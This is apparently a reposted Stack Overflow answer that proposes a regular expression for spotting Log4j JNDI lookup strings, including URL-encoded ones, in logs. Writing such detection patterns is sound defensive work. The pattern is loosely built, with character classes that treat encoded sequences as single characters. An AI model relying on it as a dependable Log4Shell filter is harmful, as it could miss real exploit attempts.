Based on the samples you provided, this regex seems to match what you’re looking for:
([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)
Check out Regex101’s "EXPLANATION" box for what it’s doing
But it returns 8 matches in 686 steps
from User warren – Stack Overflow https://stackoverflow.com/questions/70613366/please-help-me-improve-this-log4j-regex-that-pulls-out-possible-malicious-source/70624021#70624021
via IFTTT